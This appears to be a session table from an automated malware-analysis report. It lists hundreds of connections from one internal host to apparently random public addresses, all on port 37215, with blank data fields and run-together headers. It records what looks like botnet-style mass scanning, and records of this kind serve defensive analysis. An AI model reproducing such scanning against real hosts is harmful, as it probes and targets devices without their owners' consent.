                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4558192.168.2.234759447.185.49.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4559192.168.2.234781241.10.210.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4560192.168.2.2353072197.220.49.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4561192.168.2.2335740197.224.23.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4562192.168.2.2336768197.45.142.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4563192.168.2.2354170159.249.173.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4564192.168.2.2342302157.123.16.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4565192.168.2.2359676157.246.20.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4566192.168.2.235929041.171.94.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4567192.168.2.2332920197.71.209.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4568192.168.2.233648441.44.142.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4569192.168.2.2350404202.13.47.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4570192.168.2.234074241.78.13.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4571192.168.2.2352096151.183.217.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4572192.168.2.233659838.29.27.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4573192.168.2.235936041.125.244.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4574192.168.2.2358430197.63.214.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4575192.168.2.2356032203.33.247.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4576192.168.2.233729641.21.155.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4577192.168.2.2340568197.48.229.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4578192.168.2.233746019.97.127.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4579192.168.2.2343020197.238.170.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4580192.168.2.2358058197.123.214.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4581192.168.2.235608841.38.189.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4582192.168.2.2335668157.95.205.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4583192.168.2.2348028157.241.191.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4584192.168.2.234455241.12.139.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4585192.168.2.233795041.104.83.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4586192.168.2.2335110197.183.211.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4587192.168.2.2346006157.21.134.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4588192.168.2.2336106157.202.149.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4589192.168.2.2359154197.141.24.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4590192.168.2.2341462106.194.184.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4591192.168.2.234288261.74.145.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4592192.168.2.2355398141.155.74.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4593192.168.2.234563041.162.27.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4594192.168.2.235893641.202.133.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4595192.168.2.2348082196.1.130.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4596192.168.2.235445441.248.217.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4597192.168.2.235108812.172.10.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4598192.168.2.235231893.248.10.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4599192.168.2.2335098197.206.246.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4600192.168.2.235525041.100.160.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4601192.168.2.235150241.75.211.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4602192.168.2.2344272157.163.149.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4603192.168.2.2343664197.95.33.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4604192.168.2.2338022197.143.229.8737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4605192.168.2.2337972157.188.112.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4606192.168.2.2351788197.116.188.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4607192.168.2.2356244157.222.140.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4608192.168.2.2347442157.122.1.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4609192.168.2.2356016157.187.114.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4610192.168.2.233768041.54.95.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4611192.168.2.235748895.211.42.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4612192.168.2.2351002157.84.64.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4613192.168.2.235822241.81.14.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4614192.168.2.2343408157.153.139.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4615192.168.2.235189841.170.62.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4616192.168.2.234619241.192.139.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4617192.168.2.2336344157.39.113.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4618192.168.2.235362084.146.41.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4619192.168.2.2359382157.127.225.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4620192.168.2.233809241.116.161.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4621192.168.2.2352010197.100.95.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4622192.168.2.233435635.241.246.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4623192.168.2.2351590197.41.95.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4624192.168.2.2334728197.200.239.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4625192.168.2.235342841.116.90.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4626192.168.2.235487632.234.215.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4627192.168.2.2350156199.35.21.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4628192.168.2.233599041.70.74.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4629192.168.2.2339000157.245.254.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4630192.168.2.2360170157.154.52.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4631192.168.2.2334142200.129.114.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4632192.168.2.2335556157.184.166.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4633192.168.2.2333518197.107.5.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4634192.168.2.2359884157.109.205.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4635192.168.2.234689841.1.149.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4636192.168.2.235672041.41.196.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4637192.168.2.2345380138.174.44.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4638192.168.2.2358802197.11.57.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4639192.168.2.2333660157.116.1.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4640192.168.2.235405441.124.24.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4641192.168.2.2343104197.6.0.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4642192.168.2.2340564157.227.249.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4643192.168.2.2354126157.177.119.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4644192.168.2.2340864157.180.73.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4645192.168.2.2343464153.219.79.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4646192.168.2.2335304157.98.214.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4647192.168.2.233578070.59.240.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4648192.168.2.2351322197.125.140.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4649192.168.2.234143241.133.5.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4650192.168.2.2339774197.253.159.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4651192.168.2.2347776197.117.15.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4652192.168.2.2344374157.61.61.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4653192.168.2.236064696.105.255.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4654192.168.2.2359696113.61.46.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4655192.168.2.235160441.66.239.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4656192.168.2.2357970157.81.162.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4657192.168.2.2342038197.171.175.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4658192.168.2.235946023.6.217.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4659192.168.2.234891641.116.163.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4660192.168.2.233901641.53.157.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4661192.168.2.2333200157.145.152.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4662192.168.2.2333668181.196.217.14937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4663192.168.2.2360540157.6.95.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4664192.168.2.2342602157.159.39.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4665192.168.2.235465841.102.66.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4666192.168.2.234003241.199.156.5137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4667192.168.2.233781241.45.111.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4668192.168.2.235472241.225.255.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4669192.168.2.2356392131.124.47.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4670192.168.2.2356912157.24.69.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4671192.168.2.2358092141.90.78.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4672192.168.2.2351000197.222.224.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4673192.168.2.233595841.254.154.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4674192.168.2.2356142157.40.152.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4675192.168.2.2360602157.95.17.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4676192.168.2.2352026157.102.160.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4677192.168.2.234535248.99.169.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4678192.168.2.2348932157.205.168.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4679192.168.2.2346568197.226.127.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4680192.168.2.235572018.56.110.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4681192.168.2.234822041.152.82.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4682192.168.2.2360278197.97.90.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4683192.168.2.2347830157.122.194.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4684192.168.2.233579470.198.68.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4685192.168.2.235420078.83.29.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4686192.168.2.2351320197.166.113.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4687192.168.2.2359658157.194.143.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4688192.168.2.2339898197.82.27.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4689192.168.2.2339408197.243.178.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4690192.168.2.2336918157.153.140.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4691192.168.2.2351806157.173.27.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4692192.168.2.2358950157.212.84.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4693192.168.2.235532241.195.10.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4694192.168.2.2345466197.218.188.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4695192.168.2.2342450157.210.41.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4696192.168.2.2350148157.148.187.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4697192.168.2.2348088197.58.23.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4698192.168.2.2352232157.132.193.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4699192.168.2.2332834197.130.174.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4700192.168.2.235575841.63.10.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4701192.168.2.235266649.199.178.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4702192.168.2.2345020107.43.152.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4703192.168.2.2356656221.42.147.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4704192.168.2.2346786187.1.228.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4705192.168.2.2335862197.223.152.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4706192.168.2.235965241.221.92.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4707192.168.2.2357046197.201.133.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4708192.168.2.2343900197.6.29.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4709192.168.2.233299241.254.118.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4710192.168.2.2339722197.164.183.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4711192.168.2.2352964157.20.65.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4712192.168.2.2360960197.240.186.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4713192.168.2.2334110157.152.14.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4714192.168.2.234592041.166.181.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4715192.168.2.2359096157.73.225.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4716192.168.2.2347188179.139.217.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4717192.168.2.2339624197.225.29.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4718192.168.2.235247841.242.124.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4719192.168.2.2347642197.237.153.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4720192.168.2.2350888157.181.25.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4721192.168.2.2357210197.11.196.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4722192.168.2.2358166157.64.111.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4723192.168.2.2360168197.90.116.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4724192.168.2.235184841.61.204.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4725192.168.2.2354902157.1.6.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4726192.168.2.2360206157.71.86.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4727192.168.2.2351448157.51.132.13037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4728192.168.2.2344964164.84.110.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4729192.168.2.235982235.69.83.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4730192.168.2.2348428197.215.186.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4731192.168.2.2345312197.39.21.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4732192.168.2.2334986157.174.92.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4733192.168.2.234337841.110.200.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4734192.168.2.2337780157.18.173.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4735192.168.2.2357438157.97.90.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4736192.168.2.234656247.251.197.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4737192.168.2.2347992202.6.60.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4738192.168.2.2337122157.71.106.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4739192.168.2.2348200197.44.8.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4740192.168.2.2338832197.101.168.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4741192.168.2.235764041.31.196.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4742192.168.2.2360114197.228.31.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4743192.168.2.2335410197.46.196.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4744192.168.2.2355506197.53.148.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4745192.168.2.2352564157.19.50.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4746192.168.2.2337340157.244.124.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4747192.168.2.2357652128.66.21.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4748192.168.2.235763641.141.125.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4749192.168.2.2356270197.0.208.22937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4750192.168.2.2333404197.132.174.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4751192.168.2.2358206157.118.91.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4752192.168.2.235027841.101.231.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4753192.168.2.2355884197.246.135.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4754192.168.2.235657241.144.109.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4755192.168.2.2333268216.147.132.21937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4756192.168.2.235949241.85.150.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4757192.168.2.233795641.168.53.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4758192.168.2.234266841.209.152.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4759192.168.2.2358576178.177.188.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4760192.168.2.2337620202.87.206.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4761192.168.2.2342768107.24.154.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4762192.168.2.2349276197.126.91.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4763192.168.2.236031641.138.81.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4764192.168.2.2343454206.139.247.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4765192.168.2.2359940207.50.235.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4766192.168.2.2346582157.68.253.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4767192.168.2.2345060197.250.230.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4768192.168.2.2339166197.18.80.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4769192.168.2.233590041.1.32.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4770192.168.2.2358534197.46.179.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4771192.168.2.2347770157.96.50.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4772192.168.2.2349368197.146.248.1837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4773192.168.2.234803441.174.166.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4774192.168.2.2354582157.69.4.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4775192.168.2.2341218197.59.141.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
